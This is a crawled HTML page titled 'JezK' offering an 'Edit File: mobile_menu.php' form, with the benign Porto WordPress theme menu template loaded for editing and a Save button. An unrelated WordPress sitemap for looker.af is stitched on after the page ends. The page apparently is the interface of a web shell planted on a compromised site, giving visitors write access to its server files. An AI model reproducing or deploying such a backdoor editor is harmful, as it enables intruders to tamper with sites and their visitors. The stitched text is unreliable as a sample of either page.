
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: mobile_menu.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
global $porto_settings, $porto_settings_optimize;

if ( ! empty( $porto_settings[&#039;mobile-panel-type&#039;] ) ) {
	return;
}

$header_type = porto_get_header_type();
if ( &#039;overlay&#039; == $porto_settings[&#039;menu-type&#039;] ) {
	if ( empty( $header_type ) ) {
		global $porto_menu_wrap;
		if ( empty( $porto_menu_wrap ) ) {
			return;
		}
	} elseif ( ! in_array( (int) $header_type, array( 1, 4, 9, 13, 14, 17 ) ) ) {
		return;
	}
}

$is_preset = porto_header_type_is_preset();

$is_load_menu = ( ( isset( $_POST[&#039;action&#039;] ) &amp;&amp; &#039;porto_lazyload_menu&#039; == $_POST[&#039;action&#039;] ) || empty( $porto_settings_optimize[&#039;lazyload_menu&#039;] ) );

$extra_cls = &#039;&#039;;
if ( ! $is_load_menu ) {
	$extra_cls .= &#039; skeleton-body&#039;;
}
?&gt;

&lt;div id=&quot;nav-panel&quot;&gt;
	&lt;div class=&quot;container&quot;&gt;
		&lt;div class=&quot;mobile-nav-wrap&lt;?php echo esc_attr( $extra_cls ); ?&gt;&quot;&gt;
		&lt;?php
		if ( $is_load_menu ) {

			// show top navigation and mobile menu
			$menu = porto_mobile_menu( &#039;19&#039; == $header_type || empty( $header_type ) );

			if ( $menu ) {
				echo &#039;&lt;div class=&quot;menu-wrap&quot;&gt;&#039; . $menu . &#039;&lt;/div&gt;&#039;;
			}

			if ( ( ! $is_preset || 1 == $header_type || 3 == $header_type || 4 == $header_type || 9 == $header_type || 13 == $header_type || 14 == $header_type ) &amp;&amp; ! empty( $porto_settings[&#039;menu-block&#039;] ) ) {
				echo &#039;&lt;div class=&quot;menu-custom-block&quot;&gt;&#039; . wp_kses_post( $porto_settings[&#039;menu-block&#039;] ) . &#039;&lt;/div&gt;&#039;;
			}

			$menu = porto_mobile_top_navigation( true );

			if ( $menu ) {
				echo &#039;&lt;div class=&quot;menu-wrap&quot;&gt;&#039; . $menu . &#039;&lt;/div&gt;&#039;;
			}

			if ( &#039;7&#039; == $header_type || &#039;8&#039; == $header_type || ! empty( $porto_settings[&#039;mobile-panel-add-switcher&#039;] ) ) {
				// show currency and view switcher
				$switcher  = &#039;&#039;;
				$switcher .= porto_mobile_currency_switcher( true );
				$switcher .= porto_mobile_view_switcher( true );

				if ( $switcher ) {
					echo &#039;&lt;div class=&quot;menu-wrap&quot;&gt;&#039; . $switcher . &#039;&lt;/div&gt;&#039;;
				}
			}
		} else {
			echo &#039;&lt;i class=&quot;porto-loading-icon&quot;&gt;&lt;/i&gt;&#039;;
		}
		?&gt;
		&lt;/div&gt;
	&lt;/div&gt;
&lt;/div&gt;
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
